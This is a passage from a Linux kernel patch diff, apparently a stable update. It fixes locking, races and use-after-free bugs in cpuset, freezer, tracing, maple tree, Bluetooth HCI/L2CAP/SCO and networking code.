+@@ -2490,25 +2508,46 @@ out_unlock:
+ static void cpuset_cancel_attach(struct cgroup_taskset *tset)
+ {
+ 	struct cgroup_subsys_state *css;
++	struct cpuset *cs;
+ 
+ 	cgroup_taskset_first(tset, &css);
++	cs = css_cs(css);
+ 
+ 	percpu_down_write(&cpuset_rwsem);
+-	css_cs(css)->attach_in_progress--;
++	cs->attach_in_progress--;
++	if (!cs->attach_in_progress)
++		wake_up(&cpuset_attach_wq);
+ 	percpu_up_write(&cpuset_rwsem);
+ }
+ 
+ /*
+- * Protected by cpuset_rwsem.  cpus_attach is used only by cpuset_attach()
++ * Protected by cpuset_rwsem. cpus_attach is used only by cpuset_attach_task()
+  * but we can't allocate it dynamically there.  Define it global and
+  * allocate from cpuset_init().
+  */
+ static cpumask_var_t cpus_attach;
++static nodemask_t cpuset_attach_nodemask_to;
++
++static void cpuset_attach_task(struct cpuset *cs, struct task_struct *task)
++{
++	percpu_rwsem_assert_held(&cpuset_rwsem);
++
++	if (cs != &top_cpuset)
++		guarantee_online_cpus(task, cpus_attach);
++	else
++		cpumask_copy(cpus_attach, task_cpu_possible_mask(task));
++	/*
++	 * can_attach beforehand should guarantee that this doesn't
++	 * fail.  TODO: have a better way to handle failure here
++	 */
++	WARN_ON_ONCE(set_cpus_allowed_ptr(task, cpus_attach));
++
++	cpuset_change_task_nodemask(task, &cpuset_attach_nodemask_to);
++	cpuset_update_task_spread_flags(cs, task);
++}
+ 
+ static void cpuset_attach(struct cgroup_taskset *tset)
+ {
+-	/* static buf protected by cpuset_rwsem */
+-	static nodemask_t cpuset_attach_nodemask_to;
+ 	struct task_struct *task;
+ 	struct task_struct *leader;
+ 	struct cgroup_subsys_state *css;
+@@ -2523,20 +2562,8 @@ static void cpuset_attach(struct cgroup_taskset *tset)
+ 
+ 	guarantee_online_mems(cs, &cpuset_attach_nodemask_to);
+ 
+-	cgroup_taskset_for_each(task, css, tset) {
+-		if (cs != &top_cpuset)
+-			guarantee_online_cpus(task, cpus_attach);
+-		else
+-			cpumask_copy(cpus_attach, task_cpu_possible_mask(task));
+-		/*
+-		 * can_attach beforehand should guarantee that this doesn't
+-		 * fail.  TODO: have a better way to handle failure here
+-		 */
+-		WARN_ON_ONCE(set_cpus_allowed_ptr(task, cpus_attach));
+-
+-		cpuset_change_task_nodemask(task, &cpuset_attach_nodemask_to);
+-		cpuset_update_task_spread_flag(cs, task);
+-	}
++	cgroup_taskset_for_each(task, css, tset)
++		cpuset_attach_task(cs, task);
+ 
+ 	/*
+ 	 * Change mm for all threadgroup leaders. This is expensive and may
+@@ -3217,6 +3244,68 @@ static void cpuset_bind(struct cgroup_subsys_state *root_css)
+ 	percpu_up_write(&cpuset_rwsem);
+ }
+ 
++/*
++ * In case the child is cloned into a cpuset different from its parent,
++ * additional checks are done to see if the move is allowed.
++ */
++static int cpuset_can_fork(struct task_struct *task, struct css_set *cset)
++{
++	struct cpuset *cs = css_cs(cset->subsys[cpuset_cgrp_id]);
++	bool same_cs;
++	int ret;
++
++	rcu_read_lock();
++	same_cs = (cs == task_cs(current));
++	rcu_read_unlock();
++
++	if (same_cs)
++		return 0;
++
++	lockdep_assert_held(&cgroup_mutex);
++	percpu_down_write(&cpuset_rwsem);
++
++	/* Check to see if task is allowed in the cpuset */
++	ret = cpuset_can_attach_check(cs);
++	if (ret)
++		goto out_unlock;
++
++	ret = task_can_attach(task, cs->effective_cpus);
++	if (ret)
++		goto out_unlock;
++
++	ret = security_task_setscheduler(task);
++	if (ret)
++		goto out_unlock;
++
++	/*
++	 * Mark attach is in progress.  This makes validate_change() fail
++	 * changes which zero cpus/mems_allowed.
++	 */
++	cs->attach_in_progress++;
++out_unlock:
++	percpu_up_write(&cpuset_rwsem);
++	return ret;
++}
++
++static void cpuset_cancel_fork(struct task_struct *task, struct css_set *cset)
++{
++	struct cpuset *cs = css_cs(cset->subsys[cpuset_cgrp_id]);
++	bool same_cs;
++
++	rcu_read_lock();
++	same_cs = (cs == task_cs(current));
++	rcu_read_unlock();
++
++	if (same_cs)
++		return;
++
++	percpu_down_write(&cpuset_rwsem);
++	cs->attach_in_progress--;
++	if (!cs->attach_in_progress)
++		wake_up(&cpuset_attach_wq);
++	percpu_up_write(&cpuset_rwsem);
++}
++
+ /*
+  * Make sure the new task conform to the current state of its parent,
+  * which could have been changed by cpuset just after it inherits the
+@@ -3224,11 +3313,33 @@ static void cpuset_bind(struct cgroup_subsys_state *root_css)
+  */
+ static void cpuset_fork(struct task_struct *task)
+ {
+-	if (task_css_is_root(task, cpuset_cgrp_id))
++	struct cpuset *cs;
++	bool same_cs;
++
++	rcu_read_lock();
++	cs = task_cs(task);
++	same_cs = (cs == task_cs(current));
++	rcu_read_unlock();
++
++	if (same_cs) {
++		if (cs == &top_cpuset)
++			return;
++
++		set_cpus_allowed_ptr(task, current->cpus_ptr);
++		task->mems_allowed = current->mems_allowed;
+ 		return;
++	}
++
++	/* CLONE_INTO_CGROUP */
++	percpu_down_write(&cpuset_rwsem);
++	guarantee_online_mems(cs, &cpuset_attach_nodemask_to);
++	cpuset_attach_task(cs, task);
++
++	cs->attach_in_progress--;
++	if (!cs->attach_in_progress)
++		wake_up(&cpuset_attach_wq);
+ 
+-	set_cpus_allowed_ptr(task, current->cpus_ptr);
+-	task->mems_allowed = current->mems_allowed;
++	percpu_up_write(&cpuset_rwsem);
+ }
+ 
+ struct cgroup_subsys cpuset_cgrp_subsys = {
+@@ -3241,6 +3352,8 @@ struct cgroup_subsys cpuset_cgrp_subsys = {
+ 	.attach		= cpuset_attach,
+ 	.post_attach	= cpuset_post_attach,
+ 	.bind		= cpuset_bind,
++	.can_fork	= cpuset_can_fork,
++	.cancel_fork	= cpuset_cancel_fork,
+ 	.fork		= cpuset_fork,
+ 	.legacy_cftypes	= legacy_files,
+ 	.dfl_cftypes	= dfl_files,
+diff --git a/kernel/cgroup/legacy_freezer.c b/kernel/cgroup/legacy_freezer.c
+index 1b6b21851e9d4..936473203a6b5 100644
+--- a/kernel/cgroup/legacy_freezer.c
++++ b/kernel/cgroup/legacy_freezer.c
+@@ -22,6 +22,7 @@
+ #include <linux/freezer.h>
+ #include <linux/seq_file.h>
+ #include <linux/mutex.h>
++#include <linux/cpu.h>
+ 
+ /*
+  * A cgroup is freezing if any FREEZING flags are set.  FREEZING_SELF is
+@@ -350,7 +351,7 @@ static void freezer_apply_state(struct freezer *freezer, bool freeze,
+ 
+ 	if (freeze) {
+ 		if (!(freezer->state & CGROUP_FREEZING))
+-			static_branch_inc(&freezer_active);
++			static_branch_inc_cpuslocked(&freezer_active);
+ 		freezer->state |= state;
+ 		freeze_cgroup(freezer);
+ 	} else {
+@@ -361,7 +362,7 @@ static void freezer_apply_state(struct freezer *freezer, bool freeze,
+ 		if (!(freezer->state & CGROUP_FREEZING)) {
+ 			freezer->state &= ~CGROUP_FROZEN;
+ 			if (was_freezing)
+-				static_branch_dec(&freezer_active);
++				static_branch_dec_cpuslocked(&freezer_active);
+ 			unfreeze_cgroup(freezer);
+ 		}
+ 	}
+@@ -379,6 +380,7 @@ static void freezer_change_state(struct freezer *freezer, bool freeze)
+ {
+ 	struct cgroup_subsys_state *pos;
+ 
++	cpus_read_lock();
+ 	/*
+ 	 * Update all its descendants in pre-order traversal.  Each
+ 	 * descendant will try to inherit its parent's FREEZING state as
+@@ -407,6 +409,7 @@ static void freezer_change_state(struct freezer *freezer, bool freeze)
+ 	}
+ 	rcu_read_unlock();
+ 	mutex_unlock(&freezer_mutex);
++	cpus_read_unlock();
+ }
+ 
+ static ssize_t freezer_write(struct kernfs_open_file *of,
+diff --git a/kernel/cgroup/rstat.c b/kernel/cgroup/rstat.c
+index 793ecff290385..7006fc8dd6774 100644
+--- a/kernel/cgroup/rstat.c
++++ b/kernel/cgroup/rstat.c
+@@ -457,9 +457,7 @@ static void root_cgroup_cputime(struct cgroup_base_stat *bstat)
+ 	struct task_cputime *cputime = &bstat->cputime;
+ 	int i;
+ 
+-	cputime->stime = 0;
+-	cputime->utime = 0;
+-	cputime->sum_exec_runtime = 0;
++	memset(bstat, 0, sizeof(*bstat));
+ 	for_each_possible_cpu(i) {
+ 		struct kernel_cpustat kcpustat;
+ 		u64 *cpustat = kcpustat.cpustat;
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index 88821ab009b30..ec2d913280e6a 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -10041,6 +10041,16 @@ static inline void calculate_imbalance(struct lb_env *env, struct sd_lb_stats *s
+ 
+ 		sds->avg_load = (sds->total_load * SCHED_CAPACITY_SCALE) /
+ 				sds->total_capacity;
++
++		/*
++		 * If the local group is more loaded than the average system
++		 * load, don't try to pull any tasks.
++		 */
++		if (local->avg_load >= sds->avg_load) {
++			env->imbalance = 0;
++			return;
++		}
++
+ 	}
+ 
+ 	/*
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 78855e74e355f..3360d638071a1 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -1002,13 +1002,8 @@ __buffer_unlock_commit(struct trace_buffer *buffer, struct ring_buffer_event *ev
+ 		ring_buffer_unlock_commit(buffer, event);
+ }
+ 
+-/**
+- * __trace_puts - write a constant string into the trace buffer.
+- * @ip:	   The address of the caller
+- * @str:   The constant string to write
+- * @size:  The size of the string.
+- */
+-int __trace_puts(unsigned long ip, const char *str, int size)
++int __trace_array_puts(struct trace_array *tr, unsigned long ip,
++		       const char *str, int size)
+ {
+ 	struct ring_buffer_event *event;
+ 	struct trace_buffer *buffer;
+@@ -1016,7 +1011,7 @@ int __trace_puts(unsigned long ip, const char *str, int size)
+ 	unsigned int trace_ctx;
+ 	int alloc;
+ 
+-	if (!(global_trace.trace_flags & TRACE_ITER_PRINTK))
++	if (!(tr->trace_flags & TRACE_ITER_PRINTK))
+ 		return 0;
+ 
+ 	if (unlikely(tracing_selftest_running || tracing_disabled))
+@@ -1025,7 +1020,7 @@ int __trace_puts(unsigned long ip, const char *str, int size)
+ 	alloc = sizeof(*entry) + size + 2; /* possible \n added */
+ 
+ 	trace_ctx = tracing_gen_ctx();
+-	buffer = global_trace.array_buffer.buffer;
++	buffer = tr->array_buffer.buffer;
+ 	ring_buffer_nest_start(buffer);
+ 	event = __trace_buffer_lock_reserve(buffer, TRACE_PRINT, alloc,
+ 					    trace_ctx);
+@@ -1047,11 +1042,23 @@ int __trace_puts(unsigned long ip, const char *str, int size)
+ 		entry->buf[size] = '\0';
+ 
+ 	__buffer_unlock_commit(buffer, event);
+-	ftrace_trace_stack(&global_trace, buffer, trace_ctx, 4, NULL);
++	ftrace_trace_stack(tr, buffer, trace_ctx, 4, NULL);
+  out:
+ 	ring_buffer_nest_end(buffer);
+ 	return size;
+ }
++EXPORT_SYMBOL_GPL(__trace_array_puts);
++
++/**
++ * __trace_puts - write a constant string into the trace buffer.
++ * @ip:	   The address of the caller
++ * @str:   The constant string to write
++ * @size:  The size of the string.
++ */
++int __trace_puts(unsigned long ip, const char *str, int size)
++{
++	return __trace_array_puts(&global_trace, ip, str, size);
++}
+ EXPORT_SYMBOL_GPL(__trace_puts);
+ 
+ /**
+@@ -1105,22 +1112,22 @@ static void tracing_snapshot_instance_cond(struct trace_array *tr,
+ 	unsigned long flags;
+ 
+ 	if (in_nmi()) {
+-		internal_trace_puts("*** SNAPSHOT CALLED FROM NMI CONTEXT ***\n");
+-		internal_trace_puts("*** snapshot is being ignored        ***\n");
++		trace_array_puts(tr, "*** SNAPSHOT CALLED FROM NMI CONTEXT ***\n");
++		trace_array_puts(tr, "*** snapshot is being ignored        ***\n");
+ 		return;
+ 	}
+ 
+ 	if (!tr->allocated_snapshot) {
+-		internal_trace_puts("*** SNAPSHOT NOT ALLOCATED ***\n");
+-		internal_trace_puts("*** stopping trace here!   ***\n");
+-		tracing_off();
++		trace_array_puts(tr, "*** SNAPSHOT NOT ALLOCATED ***\n");
++		trace_array_puts(tr, "*** stopping trace here!   ***\n");
++		tracer_tracing_off(tr);
+ 		return;
+ 	}
+ 
+ 	/* Note, snapshot can not be used when the tracer uses it */
+ 	if (tracer->use_max_tr) {
+-		internal_trace_puts("*** LATENCY TRACER ACTIVE ***\n");
+-		internal_trace_puts("*** Can not use snapshot (sorry) ***\n");
++		trace_array_puts(tr, "*** LATENCY TRACER ACTIVE ***\n");
++		trace_array_puts(tr, "*** Can not use snapshot (sorry) ***\n");
+ 		return;
+ 	}
+ 
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index 84530fb73bd9e..39f34ea7a9be5 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -178,7 +178,7 @@ static void mt_free_rcu(struct rcu_head *head)
+  */
+ static void ma_free_rcu(struct maple_node *node)
+ {
+-	node->parent = ma_parent_ptr(node);
++	WARN_ON(node->parent != ma_parent_ptr(node));
+ 	call_rcu(&node->rcu, mt_free_rcu);
+ }
+ 
+@@ -1780,8 +1780,10 @@ static inline void mas_replace(struct ma_state *mas, bool advanced)
+ 		rcu_assign_pointer(slots[offset], mas->node);
+ 	}
+ 
+-	if (!advanced)
++	if (!advanced) {
++		mte_set_node_dead(old_enode);
+ 		mas_free(mas, old_enode);
++	}
+ }
+ 
+ /*
+@@ -4216,6 +4218,7 @@ static inline bool mas_wr_node_store(struct ma_wr_state *wr_mas)
+ done:
+ 	mas_leaf_set_meta(mas, newnode, dst_pivots, maple_leaf_64, new_end);
+ 	if (in_rcu) {
++		mte_set_node_dead(mas->node);
+ 		mas->node = mt_mk_node(newnode, wr_mas->type);
+ 		mas_replace(mas, false);
+ 	} else {
+diff --git a/net/9p/trans_xen.c b/net/9p/trans_xen.c
+index 75c03a82baf38..68027e4fb4216 100644
+--- a/net/9p/trans_xen.c
++++ b/net/9p/trans_xen.c
+@@ -278,6 +278,10 @@ static void xen_9pfs_front_free(struct xen_9pfs_front_priv *priv)
+ 	write_unlock(&xen_9pfs_lock);
+ 
+ 	for (i = 0; i < priv->num_rings; i++) {
++		struct xen_9pfs_dataring *ring = &priv->rings[i];
++
++		cancel_work_sync(&ring->work);
++
+ 		if (!priv->rings[i].intf)
+ 			break;
+ 		if (priv->rings[i].irq > 0)
+diff --git a/net/bluetooth/hci_conn.c b/net/bluetooth/hci_conn.c
+index 09e7f841f149d..c2c6dea01cc91 100644
+--- a/net/bluetooth/hci_conn.c
++++ b/net/bluetooth/hci_conn.c
+@@ -68,7 +68,7 @@ static const struct sco_param esco_param_msbc[] = {
+ };
+ 
+ /* This function requires the caller holds hdev->lock */
+-static void hci_connect_le_scan_cleanup(struct hci_conn *conn)
++static void hci_connect_le_scan_cleanup(struct hci_conn *conn, u8 status)
+ {
+ 	struct hci_conn_params *params;
+ 	struct hci_dev *hdev = conn->hdev;
+@@ -88,9 +88,28 @@ static void hci_connect_le_scan_cleanup(struct hci_conn *conn)
+ 
+ 	params = hci_pend_le_action_lookup(&hdev->pend_le_conns, bdaddr,
+ 					   bdaddr_type);
+-	if (!params || !params->explicit_connect)
++	if (!params)
+ 		return;
+ 
++	if (params->conn) {
++		hci_conn_drop(params->conn);
++		hci_conn_put(params->conn);
++		params->conn = NULL;
++	}
++
++	if (!params->explicit_connect)
++		return;
++
++	/* If the status indicates successful cancellation of
++	 * the attempt (i.e. Unknown Connection Id) there's no point of
++	 * notifying failure since we'll go back to keep trying to
++	 * connect. The only exception is explicit connect requests
++	 * where a timeout + cancel does indicate an actual failure.
++	 */
++	if (status && status != HCI_ERROR_UNKNOWN_CONN_ID)
++		mgmt_connect_failed(hdev, &conn->dst, conn->type,
++				    conn->dst_type, status);
++
+ 	/* The connection attempt was doing scan for new RPA, and is
+ 	 * in scan phase. If params are not associated with any other
+ 	 * autoconnect action, remove them completely. If they are, just unmark
+@@ -178,7 +197,7 @@ static void le_scan_cleanup(struct work_struct *work)
+ 	rcu_read_unlock();
+ 
+ 	if (c == conn) {
+-		hci_connect_le_scan_cleanup(conn);
++		hci_connect_le_scan_cleanup(conn, 0x00);
+ 		hci_conn_cleanup(conn);
+ 	}
+ 
+@@ -1051,6 +1070,17 @@ struct hci_conn *hci_conn_add(struct hci_dev *hdev, int type, bdaddr_t *dst,
+ 	return conn;
+ }
+ 
++static bool hci_conn_unlink(struct hci_conn *conn)
++{
++	if (!conn->link)
++		return false;
++
++	conn->link->link = NULL;
++	conn->link = NULL;
++
++	return true;
++}
++
+ int hci_conn_del(struct hci_conn *conn)
+ {
+ 	struct hci_dev *hdev = conn->hdev;
+@@ -1062,9 +1092,17 @@ int hci_conn_del(struct hci_conn *conn)
+ 	cancel_delayed_work_sync(&conn->idle_work);
+ 
+ 	if (conn->type == ACL_LINK) {
+-		struct hci_conn *sco = conn->link;
+-		if (sco)
+-			sco->link = NULL;
++		struct hci_conn *link = conn->link;
++
++		if (link) {
++			hci_conn_unlink(conn);
++			/* Due to race, SCO connection might be not established
++			 * yet at this point. Delete it now, otherwise it is
++			 * possible for it to be stuck and can't be deleted.
++			 */
++			if (link->handle == HCI_CONN_HANDLE_UNSET)
++				hci_conn_del(link);
++		}
+ 
+ 		/* Unacked frames */
+ 		hdev->acl_cnt += conn->sent;
+@@ -1079,7 +1117,7 @@ int hci_conn_del(struct hci_conn *conn)
+ 		struct hci_conn *acl = conn->link;
+ 
+ 		if (acl) {
+-			acl->link = NULL;
++			hci_conn_unlink(conn);
+ 			hci_conn_drop(acl);
+ 		}
+ 
+@@ -1174,31 +1212,8 @@ EXPORT_SYMBOL(hci_get_route);
+ static void hci_le_conn_failed(struct hci_conn *conn, u8 status)
+ {
+ 	struct hci_dev *hdev = conn->hdev;
+-	struct hci_conn_params *params;
+-
+-	params = hci_pend_le_action_lookup(&hdev->pend_le_conns, &conn->dst,
+-					   conn->dst_type);
+-	if (params && params->conn) {
+-		hci_conn_drop(params->conn);
+-		hci_conn_put(params->conn);
+-		params->conn = NULL;
+-	}
+-
+-	/* If the status indicates successful cancellation of
+-	 * the attempt (i.e. Unknown Connection Id) there's no point of
+-	 * notifying failure since we'll go back to keep trying to
+-	 * connect. The only exception is explicit connect requests
+-	 * where a timeout + cancel does indicate an actual failure.
+-	 */
+-	if (status != HCI_ERROR_UNKNOWN_CONN_ID ||
+-	    (params && params->explicit_connect))
+-		mgmt_connect_failed(hdev, &conn->dst, conn->type,
+-				    conn->dst_type, status);
+ 
+-	/* Since we may have temporarily stopped the background scanning in
+-	 * favor of connection establishment, we should restart it.
+-	 */
+-	hci_update_passive_scan(hdev);
++	hci_connect_le_scan_cleanup(conn, status);
+ 
+ 	/* Enable advertising in case this was a failed connection
+ 	 * attempt as a peripheral.
+@@ -1232,15 +1247,15 @@ static void create_le_conn_complete(struct hci_dev *hdev, void *data, int err)
+ {
+ 	struct hci_conn *conn = data;
+ 
++	bt_dev_dbg(hdev, "err %d", err);
++
+ 	hci_dev_lock(hdev);
+ 
+ 	if (!err) {
+-		hci_connect_le_scan_cleanup(conn);
++		hci_connect_le_scan_cleanup(conn, 0x00);
+ 		goto done;
+ 	}
+ 
+-	bt_dev_err(hdev, "request failed to create LE connection: err %d", err);
+-
+ 	/* Check if connection is still pending */
+ 	if (conn != hci_lookup_le_connect(hdev))
+ 		goto done;
+@@ -2438,6 +2453,12 @@ void hci_conn_hash_flush(struct hci_dev *hdev)
+ 		c->state = BT_CLOSED;
+ 
+ 		hci_disconn_cfm(c, HCI_ERROR_LOCAL_HOST_TERM);
++
++		/* Unlink before deleting otherwise it is possible that
++		 * hci_conn_del removes the link which may cause the list to
++		 * contain items already freed.
++		 */
++		hci_conn_unlink(c);
+ 		hci_conn_del(c);
+ 	}
+ }
+@@ -2775,6 +2796,9 @@ int hci_abort_conn(struct hci_conn *conn, u8 reason)
+ {
+ 	int r = 0;
+ 
++	if (test_and_set_bit(HCI_CONN_CANCEL, &conn->flags))
++		return 0;
++
+ 	switch (conn->state) {
+ 	case BT_CONNECTED:
+ 	case BT_CONFIG:
+diff --git a/net/bluetooth/hci_event.c b/net/bluetooth/hci_event.c
+index 0e2425eb6aa79..42a3a19b111e3 100644
+--- a/net/bluetooth/hci_event.c
++++ b/net/bluetooth/hci_event.c
+@@ -2876,16 +2876,6 @@ static void cs_le_create_conn(struct hci_dev *hdev, bdaddr_t *peer_addr,
+ 
+ 	conn->resp_addr_type = peer_addr_type;
+ 	bacpy(&conn->resp_addr, peer_addr);
+-
+-	/* We don't want the connection attempt to stick around
+-	 * indefinitely since LE doesn't have a page timeout concept
+-	 * like BR/EDR. Set a timer for any connection that doesn't use
+-	 * the accept list for connecting.
+-	 */
+-	if (filter_policy == HCI_LE_USE_PEER_ADDR)
+-		queue_delayed_work(conn->hdev->workqueue,
+-				   &conn->le_conn_timeout,
+-				   conn->conn_timeout);
+ }
+ 
+ static void hci_cs_le_create_conn(struct hci_dev *hdev, u8 status)
+@@ -5892,6 +5882,12 @@ static void le_conn_complete_evt(struct hci_dev *hdev, u8 status,
+ 	if (status)
+ 		goto unlock;
+ 
++	/* Drop the connection if it has been aborted */
++	if (test_bit(HCI_CONN_CANCEL, &conn->flags)) {
++		hci_conn_drop(conn);
++		goto unlock;
++	}
++
+ 	if (conn->dst_type == ADDR_LE_DEV_PUBLIC)
+ 		addr_type = BDADDR_LE_PUBLIC;
+ 	else
+@@ -6985,7 +6981,7 @@ static void hci_le_big_sync_established_evt(struct hci_dev *hdev, void *data,
+ 		bis->iso_qos.in.latency = le16_to_cpu(ev->interval) * 125 / 100;
+ 		bis->iso_qos.in.sdu = le16_to_cpu(ev->max_pdu);
+ 
+-		hci_connect_cfm(bis, ev->status);
++		hci_iso_setup_path(bis);
+ 	}
+ 
+ 	hci_dev_unlock(hdev);
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index f614f96c5c23d..9361fb3685cc7 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -246,8 +246,9 @@ int __hci_cmd_sync_status_sk(struct hci_dev *hdev, u16 opcode, u32 plen,
+ 
+ 	skb = __hci_cmd_sync_sk(hdev, opcode, plen, param, event, timeout, sk);
+ 	if (IS_ERR(skb)) {
+-		bt_dev_err(hdev, "Opcode 0x%4x failed: %ld", opcode,
+-				PTR_ERR(skb));
++		if (!event)
++			bt_dev_err(hdev, "Opcode 0x%4x failed: %ld", opcode,
++				   PTR_ERR(skb));
+ 		return PTR_ERR(skb);
+ 	}
+ 
+@@ -5108,8 +5109,11 @@ static int hci_le_connect_cancel_sync(struct hci_dev *hdev,
+ 	if (test_bit(HCI_CONN_SCANNING, &conn->flags))
+ 		return 0;
+ 
++	if (test_and_set_bit(HCI_CONN_CANCEL, &conn->flags))
++		return 0;
++
+ 	return __hci_cmd_sync_status(hdev, HCI_OP_LE_CREATE_CONN_CANCEL,
+-				     6, &conn->dst, HCI_CMD_TIMEOUT);
++				     0, NULL, HCI_CMD_TIMEOUT);
+ }
+ 
+ static int hci_connect_cancel_sync(struct hci_dev *hdev, struct hci_conn *conn)
+@@ -6084,6 +6088,9 @@ int hci_le_create_conn_sync(struct hci_dev *hdev, struct hci_conn *conn)
+ 				       conn->conn_timeout, NULL);
+ 
+ done:
++	if (err == -ETIMEDOUT)
++		hci_le_connect_cancel_sync(hdev, conn);
++
+ 	/* Re-enable advertising after the connection attempt is finished. */
+ 	hci_resume_advertising_sync(hdev);
+ 	return err;
+diff --git a/net/bluetooth/hidp/core.c b/net/bluetooth/hidp/core.c
+index cc20e706c6391..82cc15ad963d8 100644
+--- a/net/bluetooth/hidp/core.c
++++ b/net/bluetooth/hidp/core.c
+@@ -433,7 +433,7 @@ static void hidp_set_timer(struct hidp_session *session)
+ static void hidp_del_timer(struct hidp_session *session)
+ {
+ 	if (session->idle_to > 0)
+-		del_timer(&session->timer);
++		del_timer_sync(&session->timer);
+ }
+ 
+ static void hidp_process_report(struct hidp_session *session, int type,
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index b6f69d1feeeec..e62dadad81b31 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -4652,33 +4652,27 @@ static inline int l2cap_disconnect_req(struct l2cap_conn *conn,
+ 
+ 	BT_DBG("scid 0x%4.4x dcid 0x%4.4x", scid, dcid);
+ 
+-	mutex_lock(&conn->chan_lock);
+-
+-	chan = __l2cap_get_chan_by_scid(conn, dcid);
++	chan = l2cap_get_chan_by_scid(conn, dcid);
+ 	if (!chan) {
+-		mutex_unlock(&conn->chan_lock);
+ 		cmd_reject_invalid_cid(conn, cmd->ident, dcid, scid);
+ 		return 0;
+ 	}
+ 
+-	l2cap_chan_hold(chan);
+-	l2cap_chan_lock(chan);
+-
+ 	rsp.dcid = cpu_to_le16(chan->scid);
+ 	rsp.scid = cpu_to_le16(chan->dcid);
+ 	l2cap_send_cmd(conn, cmd->ident, L2CAP_DISCONN_RSP, sizeof(rsp), &rsp);
+ 
+ 	chan->ops->set_shutdown(chan);
+ 
++	mutex_lock(&conn->chan_lock);
+ 	l2cap_chan_del(chan, ECONNRESET);
++	mutex_unlock(&conn->chan_lock);
+ 
+ 	chan->ops->close(chan);
+ 
+ 	l2cap_chan_unlock(chan);
+ 	l2cap_chan_put(chan);
+ 
+-	mutex_unlock(&conn->chan_lock);
+-
+ 	return 0;
+ }
+ 
+@@ -4698,33 +4692,27 @@ static inline int l2cap_disconnect_rsp(struct l2cap_conn *conn,
+ 
+ 	BT_DBG("dcid 0x%4.4x scid 0x%4.4x", dcid, scid);
+ 
+-	mutex_lock(&conn->chan_lock);
+-
+-	chan = __l2cap_get_chan_by_scid(conn, scid);
++	chan = l2cap_get_chan_by_scid(conn, scid);
+ 	if (!chan) {
+ 		mutex_unlock(&conn->chan_lock);
+ 		return 0;
+ 	}
+ 
+-	l2cap_chan_hold(chan);
+-	l2cap_chan_lock(chan);
+-
+ 	if (chan->state != BT_DISCONN) {
+ 		l2cap_chan_unlock(chan);
+ 		l2cap_chan_put(chan);
+-		mutex_unlock(&conn->chan_lock);
+ 		return 0;
+ 	}
+ 
++	mutex_lock(&conn->chan_lock);
+ 	l2cap_chan_del(chan, 0);
++	mutex_unlock(&conn->chan_lock);
+ 
+ 	chan->ops->close(chan);
+ 
+ 	l2cap_chan_unlock(chan);
+ 	l2cap_chan_put(chan);
+ 
+-	mutex_unlock(&conn->chan_lock);
+-
+ 	return 0;
+ }
+ 
+diff --git a/net/bluetooth/sco.c b/net/bluetooth/sco.c
+index 1111da4e2f2bd..1755f91a66f6a 100644
+--- a/net/bluetooth/sco.c
++++ b/net/bluetooth/sco.c
+@@ -1129,6 +1129,8 @@ static int sco_sock_getsockopt(struct socket *sock, int level, int optname,
+ 			break;
+ 		}
+ 
++		release_sock(sk);
++
+ 		/* find total buffer size required to copy codec + caps */
+ 		hci_dev_lock(hdev);
+ 		list_for_each_entry(c, &hdev->local_codecs, list) {
+@@ -1146,15 +1148,13 @@ static int sco_sock_getsockopt(struct socket *sock, int level, int optname,
+ 		buf_len += sizeof(struct bt_codecs);
+ 		if (buf_len > len) {
+ 			hci_dev_put(hdev);
+-			err = -ENOBUFS;
+-			break;
++			return -ENOBUFS;
+ 		}
+ 		ptr = optval;
+ 
+ 		if (put_user(num_codecs, ptr)) {
+ 			hci_dev_put(hdev);
+-			err = -EFAULT;
+-			break;
++			return -EFAULT;
+ 		}
+ 		ptr += sizeof(num_codecs);
+ 
+@@ -1194,12 +1194,14 @@ static int sco_sock_getsockopt(struct socket *sock, int level, int optname,
+ 			ptr += len;
+ 		}
+ 
+-		if (!err && put_user(buf_len, optlen))
+-			err = -EFAULT;
+-
+ 		hci_dev_unlock(hdev);
+ 		hci_dev_put(hdev);
+ 
++		lock_sock(sk);
++
++		if (!err && put_user(buf_len, optlen))
++			err = -EFAULT;
++
+ 		break;
+ 
+ 	default:
+diff --git a/net/core/dev.c b/net/core/dev.c
+index 24eae99dfe05a..a25b8741b1599 100644
+--- a/net/core/dev.c
++++ b/net/core/dev.c
+@@ -3211,6 +3211,7 @@ static u16 skb_tx_hash(const struct net_device *dev,
+ 	}
+ 
+ 	if (skb_rx_queue_recorded(skb)) {
++		DEBUG_NET_WARN_ON_ONCE(qcount == 0);
+ 		hash = skb_get_rx_queue(skb);
+ 		if (hash >= qoffset)
+ 			hash -= qoffset;
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index 51db260f471f4..cd4b3a610961f 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -5409,18 +5409,18 @@ bool skb_try_coalesce(struct sk_buff *to, struct sk_buff *from,
+ 	if (skb_cloned(to))
+ 		return false;
+ 
+-	/* In general, avoid mixing slab allocated and page_pool allocated
+-	 * pages within the same SKB. However when @to is not pp_recycle and
+-	 * @from is cloned, we can transition frag pages from page_pool to
+-	 * reference counted.
+-	 *
+-	 * On the other hand, don't allow coalescing two pp_recycle SKBs if
+-	 * @from is cloned, in case the SKB is using page_pool fragment
++	/* In general, avoid mixing page_pool and non-page_pool allocated
++	 * pages within the same SKB. Additionally avoid dealing with clones
++	 * with page_pool pages, in case the SKB is using page_pool fragment
+ 	 * references (PP_FLAG_PAGE_FRAG). Since we only take full page
+ 	 * references for cloned SKBs at the moment that would result in
+ 	 * inconsistent reference counts.
++	 * In theory we could take full references if @from is cloned and
++	 * !@to->pp_recycle but its tricky (due to potential race with
++	 * the clone disappearing) and rare, so not worth dealing with.
+ 	 */
+-	if (to->pp_recycle != (from->pp_recycle && !skb_cloned(from)))
++	if (to->pp_recycle != from->pp_recycle ||
++	    (from->pp_recycle && skb_cloned(from)))
+ 		return false;
+ 
+ 	if (len <= skb_tailroom(to)) {
